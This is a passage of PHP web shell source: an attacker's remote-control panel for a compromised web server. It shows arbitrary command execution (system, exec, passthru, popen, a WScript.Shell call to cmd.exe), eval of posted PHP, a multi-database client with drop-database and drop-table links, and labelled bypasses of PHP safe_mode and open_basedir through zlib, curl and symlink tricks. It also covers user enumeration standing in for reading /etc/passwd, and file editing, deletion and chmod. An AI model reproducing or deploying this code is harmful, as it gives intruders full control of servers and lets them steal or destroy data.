$ofile4c=fopen($_REQUEST['address'].$slash.$_REQUEST['nf4c'],"w");
fwrite($ofile4c,$_REQUEST['nf4cs']);
fclose($ofile4c);
}else{echo $deny;exit;}}

function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST['serveR']) &amp;&amp; !empty($_REQUEST['useR']) &amp;&amp; isset($_REQUEST['pasS']) &amp;&amp; !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];

}

if (isset ($_GET[select_db])){
	$getdb=$_GET[select_db];
	$_SESSION[db]=$getdb;
	$query="SHOW TABLES";
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[select_tbl])){
	$tbl=$_GET[select_tbl];
	$_SESSION[tbl]=$tbl;
	$query="SELECT * FROM `$tbl`";
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[drop_db])){
	$getdb=$_GET[drop_db];
	$_SESSION[db]=$getdb;
	$query="DROP DATABASE `$getdb`";
	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
}
elseif (isset ($_GET[drop_tbl])){
	$getbl=$_GET[drop_tbl];
	$query="DROP TABLE `$getbl`";
	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
}
elseif (isset ($_GET[drop_row])){
	$getrow=$_GET[drop_row];
	$getclm=$_GET[clm];
	$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
	$tbl=$_SESSION[tbl];
	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
}
else
	$res=querY($type,$server,$user,$pass,$db,$query);

if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode('[+][+][+]',$res);
$trow=explode('[-][-][-]',$title[1]);
$row=explode('|+|+|+|+|+|',$title[0]);
$data=array();
$field=$trow[count($trow)-2];
if (strstr($trow[0],'Database')!='')
	$obj='db';
elseif (substr($trow[0],0,6)=='Tables')
	$obj='tbl';
else
	$obj='row';
$i=0;
foreach ($row as $a){
if($a!='')
$data[$i++]=explode('|-|-|-|-|-|',$a);
}

echo "&lt;table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'&gt;&lt;tr&gt;";
foreach ($trow as $ti)
echo "&lt;td bgcolor='F2F2F2'&gt;$ti&lt;/td&gt;";
echo "&lt;/tr&gt;";
$j=0;
while ($data[$j]){
	echo "&lt;tr&gt;";
	foreach ($data[$j++] as $dr){
		echo "&lt;td&gt;";
		if($obj!='row') echo "&lt;a href='$_SERVER[PHP_SELF]?do=db&amp;select_$obj=$dr'&gt;";
		echo $dr;
		if($obj!='row') echo "&lt;/a&gt;";
		echo "&lt;/td&gt;";
	}
	echo "&lt;td&gt;&lt;a href='$_SERVER[PHP_SELF]?do=db&amp;drop_$obj=$dr";
	if($obj=='row')
		echo "&amp;clm=$field";
	echo "'&gt;Drop&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;";
}
echo "&lt;/table&gt;&lt;br&gt;";

}

if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
echo "&lt;center&gt;&lt;form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'&gt;&lt;table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'&gt;&lt;tr&gt;&lt;td width='400' colspan='2' bgcolor='#F2F2F2'&gt;&lt;p align='center'&gt;&lt;b&gt;&lt;font face='Arial' size='2' color='#433934'&gt;Connect to Database&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='150' bgcolor='#EAEAEA'&gt;&lt;font face='Arial' size='2'&gt;DB Type:&lt;/font&gt;&lt;/td&gt;&lt;td width='250' bgcolor='#EAEAEA'&gt;&lt;select name=typE&gt;&lt;option valut=MySQL  onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MySQL')echo 'selected';
echo "&gt;MySQL&lt;/option&gt;&lt;option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MSSQL')echo 'selected';
echo "&gt;MSSQL&lt;/option&gt;&lt;option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
if ($_REQUEST['typE']=='Oracle')echo 'selected';
echo "&gt;Oracle&lt;/option&gt;&lt;option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
echo "&gt;PostgreSQL&lt;/option&gt;&lt;option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='DB2')echo 'selected';
echo "&gt;IBM DB2&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='150' bgcolor='#EAEAEA'&gt;&lt;font face='Arial' size='2'&gt;Server Address:&lt;/font&gt;&lt;/td&gt;&lt;td width='250' bgcolor='#EAEAEA'&gt;&lt;input type=text value='";
if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
echo "' name=serveR size=35&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='150' bgcolor='#EAEAEA'&gt;&lt;font face='Arial' size='2'&gt;Username:&lt;/font&gt;&lt;/td&gt;&lt;td width='250' bgcolor='#EAEAEA'&gt;&lt;input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
echo "' size=35&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='150' bgcolor='#EAEAEA'&gt;&lt;font face='Arial' size='2'&gt;Password:&lt;/font&gt;&lt;/td&gt;&lt;td width='250' bgcolor='#EAEAEA'&gt;&lt;input type=text value='";
if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
echo "' name=pasS size=35&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='400' colspan='2' bgcolor='#F2F2F2'&gt;&lt;p align='center'&gt;&lt;b&gt;&lt;font face='Arial' size='2' color='#433934'&gt;Submit a Query&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='150' bgcolor='#EAEAEA'&gt;&lt;font face='Arial' size='2'&gt;DB Name:&lt;/font&gt;&lt;/td&gt;&lt;td width='250' bgcolor='#EAEAEA'&gt;&lt;input type=text value='";
if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
echo "' name=dB size=35&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='150' bgcolor='#EAEAEA'&gt;&lt;font face='Arial' size='2'&gt;Query:&lt;/font&gt;&lt;/td&gt;&lt;td width='250' bgcolor='#EAEAEA'&gt;&lt;textarea name=querY rows=5 cols=27&gt;";
if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
echo "&lt;/textarea&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width='400' colspan='2' bgcolor='#EAEAEA'&gt;$hcwd&lt;input type=submit value='Submit' style='float: right'&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;$et&lt;/center&gt;";
}

function querY($type,$host,$user,$pass,$db='',$query){
$res='';
switch($type){
case 'MySQL':
if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);
if($link){
if(!empty($db))mysql_select_db($db,$link);
$result=mysql_query($query,$link);
if ($result!=1){
while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i&lt;mysql_num_fields($result);$i++)
$res.=mysql_field_name($result,$i).'[-][-][-]';
}
mysql_close($link);
return $res;
}
break;
case 'MSSQL':
if(!function_exists('mssql_connect'))return 0;
$link=mssql_connect($host,$user,$pass);
if($link){
if(!empty($db))mssql_select_db($db,$link);
$result=mssql_query($query,$link);
while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i&lt;mssql_num_fields($result);$i++)
$res.=mssql_field_name($result,$i).'[-][-][-]';
mssql_close($link);
return $res;
}
break;
case 'Oracle':
if(!function_exists('ocilogon'))return 0;
$link=ocilogon($user,$pass,$db);
if($link){
$stm=ociparse($link,$query);
ociexecute($stm,OCI_DEFAULT);
while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i&lt;oci_num_fields($stm);$i++)
$res.=oci_field_name($stm,$i).'[-][-][-]';
return $res;
}
break;
case 'PostgreSQL':
if(!function_exists('pg_connect'))return 0;
$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
if($link){
$result=pg_query($link,$query);
while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i&lt;pg_num_fields($result);$i++)
$res.=pg_field_name($result,$i).'[-][-][-]';
pg_close($link);
return $res;
}
break;
case 'DB2':
if(!function_exists('db2_connect'))return 0;
$link=db2_connect($db,$user,$pass);
if($link){
$result=db2_exec($link,$query);
while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i&lt;db2_num_fields($result);$i++)
$res.=db2_field_name($result,$i).'[-][-][-]';
db2_close($link);
return $res;
}
break;
}
return 0;
}
function bywsym($file){
if(!function_exists('symlink')){echo "Function Symlink Not Exist";}

if(!is_writable("."))
	die("not writable directory");
$level=0;
for($as=0;$as&lt;$fakedep;$as++){
	if(!file_exists($fakedir))
		mkdir($fakedir);
	chdir($fakedir);
}
while(1&lt;$as--) chdir("..");
$hardstyle = explode("/", $file);
for($a=0;$a&lt;count($hardstyle);$a++){
	if(!empty($hardstyle[$a])){
		if(!file_exists($hardstyle[$a]))
			mkdir($hardstyle[$a]);
		chdir($hardstyle[$a]);
		$as++;
}}
$as++;
while($as--)
	chdir("..");
@rmdir("fakesymlink");
@unlink("fakesymlink");
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
while(1)
	if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
	else $num++;
@unlink("fakesymlink");
mkdir("fakesymlink");
}
function bypcu($file){
$level=0;

if(!file_exists("file:"))
	mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a&lt;count($hardstyle);$a++){
	if(!empty($hardstyle[$a])){
		if(!file_exists($hardstyle[$a]))
			mkdir($hardstyle[$a]);
		chdir($hardstyle[$a]);
		$level++;
	}
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '&lt;FONT COLOR="RED"&gt; &lt;textarea rows="40" cols="120"&gt;';

if(FALSE==curl_exec($ch))
	die('&gt;Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' &lt;/textarea&gt; &lt;/FONT&gt;';

curl_close($ch);
}
if ($_REQUEST['bypcu']){
bypcu($_REQUEST['bypcu']);
}
if($_REQUEST['do']=="bypasscmd"){
if($_POST['bycw']){
echo $_POST['bycw'];
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
            $exec = $wsh-&gt;exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
            $stdout = $exec-&gt;StdOut();
            $stcom = $stdout-&gt;ReadAll();}

echo $head.'&lt;p align="center"&gt;&lt;textarea rows="13" name="showbsd" cols="77"&gt;';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'&lt;/textarea&gt;&lt;hr&gt;&lt;center&gt;Bypass Safe_Mode And Disable_Functions In Windows Server&lt;br&gt;&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right" valign="top"&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formp.'&lt;input type=hidden value="bypasscmd" name=do&gt;Command &lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=bycw size=50&gt;&lt;input type=submit value ="eXecute"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;Bypass Safe_Mode Windows Server&lt;br&gt;&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right" valign="top"&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formp.'Command &lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=byws size=50&gt;&lt;input type=submit value ="eXecute"&gt;&lt;input type=hidden name=do value="bypasscmd"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;'.$end;exit;;
}
if($_REQUEST['do']=="bypassdir"){
if($_POST['byoc']){
if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
}else{$bopens="Can Not Bypass This";}
}
if($_POST['byfc']){
curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
$debfc=curl_exec($ch);
}
if($_POST['byetc']){
for($bye=0;$bye&lt;40000;$bye++){   //cat /etc/passwd
$sbep =$sbep. posix_getpwuid($bye);
}}
if($_POST['byfc9']){
echo "not sucsfull";
}
if($_REQUEST['bysyml']){
$file=$_REQUEST['bysyml'];
bywsym($file);
}
echo $head.'&lt;p align="center"&gt;&lt;textarea rows="13" name="showbsd" cols="77"&gt;';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe&lt;count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){var_dump($debfc);} echo $bopens.'&lt;/textarea&gt;&lt;hr&gt;&lt;center&gt;Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2&lt;br&gt;&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right"&gt;'.$formp.'&lt;input type=hidden value="bypassdir" name=do&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;Address File &lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=byoc size=50 &gt;&lt;input type=submit value ="read"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;hr&gt;Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4&lt;br&gt;&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right" valign="top"&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formp.'Address File &lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=byfc size=50&gt;&lt;input type=submit value ="eXecute"&gt;&lt;input type=hidden name=do value="bypassdir"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;hr&gt;Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9&lt;br&gt;&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right" valign="top"&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formp.'Address File &lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=byfc9 size=50&gt;&lt;input type=submit value ="eXecute"&gt;&lt;input type=hidden name=do value="bypassdir"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;hr&gt;Bypass /Etc/Passwd&lt;br&gt;'.$formp.'&lt;input type=submit value ="Read Passwd"&gt;&lt;input type=hidden name=byetc value="lol"&gt;&lt;input type=hidden name=do value="bypassdir"&gt;&lt;/form&gt;&lt;hr&gt;Bypass With ini_restore'.$formp.'&lt;input type=submit value ="Read File"&gt;&lt;input name=rfili value="Pejijon" type=hidden&gt;&lt;input type=hidden name=do value="bypassdir"&gt;&lt;/form&gt;&lt;hr&gt;Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right" valign="top"&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formp.'&lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=bysyml size=50&gt;&lt;input type=submit value ="Read File"&gt;&lt;input type=hidden name=do value="bypassdir"&gt;&lt;input name=rfili value="Pejijon" type=hidden&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;hr&gt;'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;&lt;td width="200" align="right" valign="top"&gt;&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formp.'&lt;/font&gt;&lt;/td&gt;&lt;td width="750"&gt;&lt;input name=bypcu size=50&gt;&lt;input type=submit value ="Read File"&gt;&lt;input type=hidden name=do value="bypassdir"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;'.$end;exit;;

}
if($_POST['nameren'] &amp;&amp; $_POST['addressren']){
if(is_writable($_REQUEST['addressren'])){

rename($_POST['addressren'],$_POST['nameren']);}else{echo $deny;exit;}
}
if($_GET['do']=="delete"){

if ($_GET['type']=="dir"){
if(is_writable($_REQUEST['address'])){
$dir=$_GET['address'].$_GET['filename'];
deleteDirectory($dir);
}elseif($_GET['type']=="file"){
if(is_writable($_GET['address'].$_GET['filename'])){

unlink($_GET['address'].$_GET['filename']);}else{echo $deny;exit;}
}
}}
if($_POST['fedit'] &amp;&amp; $_POST['namefe']){
if(is_writable($_REQUEST['address'])){

$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
echo bazam;
fwrite($opensave,$_POST['fedit']);
fclose($opensave);}else{echo $deny;exit;}
}
if ($_POST['evalsource']){

eval($_POST['evalsource']);
}
if($_GET['do']=="eval"){
echo $head.$formp.$nowaddress.'&lt;p align="center"&gt;&lt;textarea rows="19" name="evalsource" cols="87"&gt;&lt;/textarea&gt;&lt;br&gt;&lt;input type=submit value="  eXecute  "&gt;&lt;/form&gt;&lt;/p&gt;'.$end;exit;
}
if($_GET['do']=="info"){
if(ini_get('safe_mode')){
$safe_modes="On";
}else{
$safe_modes="Off";
}
if(ini_get('disable_functions')){
$disablef=ini_get('disable_functions');
}else{
$disablef="All Functions Enable";
}
if(ini_get('register_globals')){
$registerg="Enable";
}else{
$registerg="disable";
}
if(extension_loaded('curl')){
$curls="Enable";
}else{
$curls="disable";
}
if(@function_exists('mysql_connect')){
$db_on = "Mysql : On";
};
if(@function_exists('mssql_connect')){
$db_on = "Mssql : On";
};
if(@function_exists('pg_connect')){
$db_on = "PostgreSQL : On";
};if(@function_exists('ocilogon')){
$db_on = "Oracle : On";
};

echo $head."&lt;font face='Tahoma' size='2'&gt;Operating System : ".php_uname()."&lt;br&gt;Server Name : ".$_SERVER['HTTP_HOST']."&lt;br&gt;Disable_Functions : ".$disablef."&lt;br&gt;Safe_Mode : ".$safe_modes."&lt;br&gt;Openbase_dir : ".ini_get('openbase_dir')."&lt;br&gt;Php Version : ".phpversion()."&lt;br&gt;Free Space : ".sizee(disk_free_space("/"))."&lt;br&gt;Total Space : ".sizee(disk_total_space("/"))."&lt;br&gt;Register_Globals : ".$registerg."&lt;br&gt;Curl : ".$curls."&lt;br&gt;Database ".$db_on."&lt;br&gt;Server Name : ".$_SERVER['HTTP_HOST']."&lt;br&gt;Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
exit;
}
if ($_GET['do']=="cmd"){
echo $head.'
&lt;form method=get action="'.$me.'"&gt;
&lt;p align="center"&gt;
&lt;textarea rows="19" name="S1" cols="87"&gt;';if (strlen($_GET['command'])&gt;1 &amp;&amp; $_GET['execmethod']!="popen"){
echo $_GET['execmethod']($_GET['command']);}
if (strlen($_GET['command'])&gt;1 &amp;&amp; $_GET['execmethod']=="popen"){
popen($_GET['command'],"r");}

echo'&lt;/textarea&gt;&lt;/p&gt;&lt;p align="center"&gt;
&lt;input type=hidden name="do" size="50" value="cmd"&gt; &lt;input type="text" name="command" size="50"&gt;&lt;select name=execmethod&gt;
  &lt;option value="system"&gt;System&lt;/option&gt;  &lt;option value="exec"&gt;Exec&lt;/option&gt;  &lt;option value="passthru"&gt;Passthru&lt;/option&gt;&lt;option value="popen"&gt;popen&lt;/option&gt;
&lt;/select&gt;&lt;input type="submit" value="eXecute"&gt;
&lt;/p&gt;&lt;/form&gt;'.$end;exit;}
if($_GET['do']=="db"){
echo $head;sqlclienT();echo $end;
exit;
}
if($_REQUEST['file2ch'] &amp;&amp; $_REQUEST['chmodnow']){
$chmodnum2=$_REQUEST['chmodnow'];
chmod($_REQUEST['file2ch'],"0".$chmodnum2);
}
if($_GET['do']=="chmod"){
echo $head.$formg.$nowaddress."&lt;p align=center&gt;&lt;b&gt;Chmod&lt;/b&gt;&lt;br&gt;&lt;input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'&gt; To  &lt;input name=chmodnow size=1 value=777&gt;&lt;br&gt;&lt;input type=submit value=Set&gt;&lt;/form&gt;".$end;exit;

}
if($_GET['do']=="edit"){
if($_GET['filename']=="dir"){
if(is_readable($_GET['address'].$_GET['filew'])){
chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;}

}}
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
for($countback=0;$countback&lt;count($addr1backk);$countback++){
$arraybacke[$countback]=$slash.$addr1backk[$countback];
$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
}
if ($slash=="\\"){
$countback=null;
$backdirwin=null;
for($countback=1;$countback&lt;count($addr1backk);$countback++){
$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
}else{
$countback=null;
$backdirwin=null;
for($countback=1;$countback&lt;count($addr1backk);$countback++){
$backdirwin=$backdirwin."/".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
var_dump($backaddresss);
$backaddresss=str_replace("\\","/",$backaddresss);
}
function calc_dir_size($path)
{
$size = 0;
if ($handle = opendir($path))
{
while (false !== ($entry = readdir($handle)))
{
$current_path = $path . '/' . $entry;
if ($entry != '.' &amp;&amp; $entry != '..' &amp;&amp; !is_link($current_path))
{
if (is_file($current_path))
$size += filesize($current_path);
elseif (is_dir($current_path))
$size = calc_dir_size($current_path);
}
}
}
closedir($handle);
return $size;
}
if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
if($cwd==''){$cwd=getcwd();}$nowaddress='&lt;input type=hidden name=address value="'.$cwd.'"&gt;';
$ad=getcwd();
$hand=opendir("$ad");
while (false !== ($fileee = readdir($hand))) {
        if ($fileee != "." &amp;&amp; $fileee != "..") {
		if (filetype($fileee)=="dir"){
$fil=$fil.'&lt;table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr"&gt;
&lt;tr&gt;&lt;td valign="top" height="19" width="842"&gt;&lt;p align="left"&gt;&lt;span lang="en-us"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=edit&amp;address='.$cwd.$slash.'&amp;filename=dir&amp;filew='.$fileee.'"&gt;'.$fileee.'&lt;/span&gt;&lt;/td&gt;
&lt;td valign="top" height="19" width="65"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;'.date("y/m/d", filectime($fileee)).'&lt;/td&gt;&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=chmod&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'&lt;/a&gt;&lt;/td&gt;&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;/td&gt;&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=rename&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;Ren&lt;/a&gt;&lt;/td&gt;
&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=delete&amp;type=dir&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;Del&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;'
;}
else{
$file=$file.'&lt;table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr"&gt;
&lt;tr&gt;&lt;td valign="top" height="19" width="842"&gt;&lt;p align="left"&gt;&lt;span lang="en-us"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=edit&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;'.$fileee.'&lt;/span&gt;&lt;/td&gt;
&lt;td valign="top" height="19" width="80"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;'.sizee(filesize($fileee)).'&lt;/td&gt;&lt;td valign="top" height="19" width="65"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;'.date("y/m/d", filectime($fileee)).'&lt;/td&gt;&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=chmod&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'&lt;/a&gt;&lt;/td&gt;&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=edit&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;Edit&lt;/a&gt;&lt;/td&gt;&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=rename&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;Ren&lt;/a&gt;&lt;/td&gt;
&lt;td valign="top" height="19" width="30"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;a href="?do=delete&amp;type=file&amp;address='.$cwd.$slash.'&amp;filename='.$fileee.'"&gt;Del&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;'
;}
}
}
echo $head.'
&lt;font face="Tahoma" style="font-size: 6pt"&gt;&lt;table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr"&gt;
&lt;tr&gt;&lt;td valign="top" height="19" width="842"&gt;&lt;p align="left"&gt;&lt;span lang="en-us"&gt;&lt;font face="Tahoma" style="font-size: 9pt"&gt;&lt;font color=#4a7af4&gt;Now Directory : '.$backaddresss.'&lt;br&gt;&lt;a href="?do=back&amp;address='.$backaddresss.'"&gt;&lt;font color=#000000&gt;Back&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;&lt;/table&gt;'.$fil.$file.'&lt;/table&gt;
&lt;table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"&gt;&lt;tr&gt;
&lt;td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
&lt;font face="Tahoma" style="font-size: 10pt; font-weight:700"&gt;'.$formg.'Change Directory&lt;/font&gt;&lt;/td&gt;
&lt;td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;&lt;input name=address value='.getcwd().'&gt;&lt;input type=submit value="Go"&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"&gt;
